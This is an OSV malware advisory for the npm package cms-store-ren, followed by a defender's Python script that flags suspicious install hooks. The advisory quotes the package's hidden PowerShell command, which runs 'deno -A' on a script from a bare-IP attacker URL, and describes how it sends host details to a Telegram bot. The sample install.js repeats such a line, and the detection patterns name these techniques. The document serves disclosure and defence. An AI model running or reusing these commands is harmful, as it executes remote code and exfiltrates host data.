cms-store-ren @1.1.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5364
Ecosystem
npm
Summary
The package's scripts.install runs install.js on every npm install. The script unconditionally POSTs the installer's hostname, OS, and architecture to api.telegram.org using a hardcoded bot token and chat ID (install.js:7 sets BOT_TOKEN = '8877182499:...'; install.js:50-56 builds the message and sends it via sendTelegramMessage()). On Windows, the same script writes a hidden PowerShell bootstrapper that installs Scoop/Winget and Deno, then executes deno -A http://77.90.185.225/deee80f30a6921b4.js, fetching an arbitrary JavaScript payload from a bare-IP HTTP URL and running it with all Deno permissions under a hidden PowerShell window. The package has no legitimate functionality (index.js only logs a string; the author is the placeholder "work1" and the description is "cms install") and exists solely to deliver the install-time payload. Both install-time host reconnaissance exfiltration and install-time arbitrary remote code execution from attacker infrastructure are present.
Source: amazon-inspector (da3593e36ce898d648883ea6f911a5cec1f75f9e8bda5585f7ff5f8754c821de)
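A defender-side triage of the behaviours the summary describes, as an added example that is not part of the OSV record or of the package: it flags lifecycle install hooks in package.json and the install-script indicators named above (Telegram bot API calls, a hardcoded bot token, bare-IP HTTP URLs, deno -A remote execution, a hidden PowerShell window). The package.json and install.js below are constructed stand-ins with placeholder values, not the real package's files.

```python
import json
import re

# Lifecycle scripts npm runs automatically around installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicator patterns drawn from the report's description of install.js.
INDICATORS = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
    "hardcoded_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{30,}\b"),
    "bare_ip_http_url": re.compile(r"http://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/"),
    "deno_allow_all_remote": re.compile(r"deno\s+(?:run\s+)?-A\s+https?://"),
    "hidden_powershell": re.compile(r"-WindowStyle\s+Hidden", re.IGNORECASE),
}

# Constructed sample package: placeholder token, documentation-range IP.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-pkg", "version": "1.0.0",
    "scripts": {"install": "node install.js"},
})
SAMPLE_INSTALL_JS = r"""
const BOT_TOKEN = '0000000000:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`);
const ps = 'powershell -WindowStyle Hidden -c "deno -A http://203.0.113.10/payload.js"';
"""

def install_hooks(package_json: str) -> list[str]:
    """Return the lifecycle hooks declared under scripts, in hook order."""
    scripts = json.loads(package_json).get("scripts", {})
    return [hook for hook in INSTALL_HOOKS if hook in scripts]

def scan_script(source: str) -> list[str]:
    """Return the names of every indicator pattern found in the text."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def triage(package_json: str, files: dict[str, str]) -> dict:
    """Resolve each hook's command to the local .js files it names, scan the
    command line plus those files, and recommend blocking on any hit."""
    scripts = json.loads(package_json).get("scripts", {})
    hits = {}
    for hook in install_hooks(package_json):
        cmd = scripts[hook]
        referenced = re.findall(r"[\w./-]+\.js", cmd)
        text = "\n".join([cmd] + [files.get(f, "") for f in referenced])
        hits[hook] = scan_script(text)
    return {"hooks": list(hits), "hits": hits, "block": any(hits.values())}
```

Run triage(SAMPLE_PACKAGE_JSON, {"install.js": SAMPLE_INSTALL_JS}) to see every indicator fire on the constructed sample; a package with no lifecycle hooks yields an empty hit list and block=False.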